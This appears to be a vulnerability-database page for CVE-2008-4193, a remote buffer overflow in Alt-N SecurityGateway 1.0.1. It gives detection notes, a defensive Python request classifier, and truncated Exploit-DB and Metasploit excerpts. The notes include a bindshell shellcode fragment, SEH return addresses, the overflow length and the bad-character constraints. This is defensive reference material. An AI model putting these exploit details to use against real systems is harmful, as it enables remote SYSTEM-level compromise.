CVE-2008-4193
Published 2008-09-24
Priority: P266 · critical · 10 (CVSS 2.0)
AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 74.61% (99.4th percentile)
Stack-based buffer overflow in SecurityGateway.dll in Alt-N Technologies SecurityGateway 1.0.1 allows remote attackers to execute arbitrary code via a long username parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alt-n | securitygateway | — | — |
Detection & IOCs
bytes
Bindshell shellcode (port 9998): \x6a\x20\x5b\x93\xf7\xe0\x91\xe8\xff\xff\xff\xff\x30\x5e...
- Detect exploit attempts by monitoring HTTP POST requests to /SecurityGateway.dll on port 4000 with an abnormally long 'username' parameter (overflow triggers at ~720 chars, payload space is 476 bytes).
- Look for POST body containing 'RequestedPage=login' with a 'username' field exceeding normal length bounds sent to /SecurityGateway.dll.
- The exploit uses an SEH-based overwrite; monitor for return address 0x6767756f (XceedZip.dll p/p/r) or 0x67672190 appearing in crash dumps or memory analysis of SecurityGateway process.
- Fingerprint the vulnerable service by sending a GET to /SecurityGateway.dll and checking the response for 'SecurityGateway 1.0.1' in the banner, as used by the Metasploit auto-targeting logic.
- Successful exploitation results in a bind shell on port 9998 (shellcode default); monitor for unexpected listening services on port 9998 on Windows hosts running SecurityGateway.
- The service does not restart after exploitation; only one exploitation attempt is possible per service instance.
- The username input is lowercased via CharLowerBuff() before the overflow, restricting usable shellcode bytes; payloads must avoid uppercase (0x41-0x5A), 0x00, 0x40, 0x7B, 0xAA, 0xC0-0xC2, 0x80-0x81.
- Successful exploitation yields SYSTEM-level privileges due to the privilege level of the SecurityGateway service process.
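An added example (not taken from the indexed sources) of the request-level check described in the detection notes above: it parses a raw HTTP request, matches POSTs to /SecurityGateway.dll carrying RequestedPage=login, and measures the decoded username. The 256-character policy bound, the case-insensitive path match, the `password` field and the host name are assumptions, and the sample requests are constructed.

```python
from urllib.parse import parse_qs, urlsplit

TARGET_PATH = "/securitygateway.dll"  # path from the page; case-insensitive match is an assumption
MAX_USERNAME = 256    # assumed policy bound, well below the reported trigger length
OVERFLOW_LEN = 720    # approximate trigger length reported on the page

def classify_request(raw: bytes) -> str:
    """Classify one raw HTTP request: ignore / ok / suspicious / overflow-length."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    if len(parts) != 3:
        return "ignore"
    method, target, _version = parts
    if method.upper() != "POST" or urlsplit(target).path.lower() != TARGET_PATH:
        return "ignore"
    # Decode the form body first so percent-encoding cannot distort the measured length.
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True, encoding="latin-1")
    if "login" not in fields.get("RequestedPage", []):
        return "ignore"
    # Repeated username fields are all checked; the longest one decides.
    longest = max((len(v) for v in fields.get("username", [])), default=0)
    if longest >= OVERFLOW_LEN:
        return "overflow-length"
    return "suspicious" if longest > MAX_USERNAME else "ok"

def build_post(username: str, path: str = "/SecurityGateway.dll") -> bytes:
    """Build a constructed sample request (host and password field are placeholders)."""
    body = f"RequestedPage=login&username={username}&password=x"
    return (f"POST {path} HTTP/1.1\r\nHost: mail.example.test:4000\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}").encode("latin-1")

# Constructed samples, not captured traffic.
SAMPLES = {
    "normal": build_post("admin%40example.test"),
    "long": build_post("a" * 300),
    "encoded": build_post("%61" * 300),      # 900 raw bytes, 300 decoded characters
    "trigger": build_post("a" * 720),
    "other_path": build_post("a" * 720, path="/index.html"),
    "get": b"GET /SecurityGateway.dll HTTP/1.1\r\nHost: mail.example.test:4000\r\n\r\n",
}

def scan(samples: dict) -> dict:
    return {name: classify_request(raw) for name, raw in samples.items()}

if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name:10s} {verdict}")
```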
No detection rules found.
Exploit-DB
Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (Metasploit)
exploitdb·2010-07-07
---
##
# $Id: altn_securitygateway.rb 9719 2010-07-07 17:38:59Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :uri => '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Alt-N SecurityGateway username Buffer Overflow',
'Description' => %q{
Alt-N SecurityGateway is prone to a buffer overflow condition. This
is due to insufficien
Exploit-DB
Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow
exploitdb·2008-06-15
---
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Alt-N SecurityGateway v1.00-1.01
* ----------------------------------------
* Exploit : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit
* Exploit date : 11.06.2008-14.06.2008
* Exploit writer : Heretic2 ([email protected])
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Details : Obtain the overflow and crash the application is a piece of cake job.
* To make a working code execution here is a hell. First we can see that
* the username before overflow the buffer pass through some functions,
* that changes and restrict some useful chars. Firstly the buffer gets
* lowered so the overflow should not contai
Exploit-DB
Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)
exploitdb·2008-06-01
---
##################################################################################################################
# SecurityGateway 1.0.1 Remote Buffer Overflow ( username)
# Vendor: http://www.altn.com/
# risk : critical
#SecurityGateway open port 4000 for remote administration/management, EIP get owned when the username field is filled with 720 chars
#
#eax=00000000 ebx=00000000 ecx=63636363 edx=7c9137d8 esi=00000000 edi=00000000
#eip=63636363 esp=042ce910 ebp=042ce930 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
#63636363 ?? ???
#
# Replace http://127.0.0.1:4000/ with your remote host.
use LWP::UserAgent;
$connect = LWP::UserAgent->new;
my $payload1 ="a" x 236;
my
Metasploit
Alt-N SecurityGateway username Buffer Overflow
metasploit
Alt-N SecurityGateway is prone to a buffer overflow condition. This is due to insufficient bounds checking on the "username" parameter. Successful exploitation could result in code execution with SYSTEM level privileges. NOTE: This service doesn't restart, you'll only get one shot. However, it often survives a successful exploitation attempt.
No writeups or analysis indexed.
- http://files.altn.com/securitygateway/release/relnotes_en.htm
- http://secunia.com/advisories/30497
- http://securityreason.com/securityalert/4302
- http://www.securityfocus.com/bid/29457
- http://www.securitytracker.com/id?1020156
- http://www.vupen.com/english/advisories/2008/1717/references
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42769
- https://www.exploit-db.com/exploits/5718
- https://www.exploit-db.com/exploits/5827
Published: 2008-09-24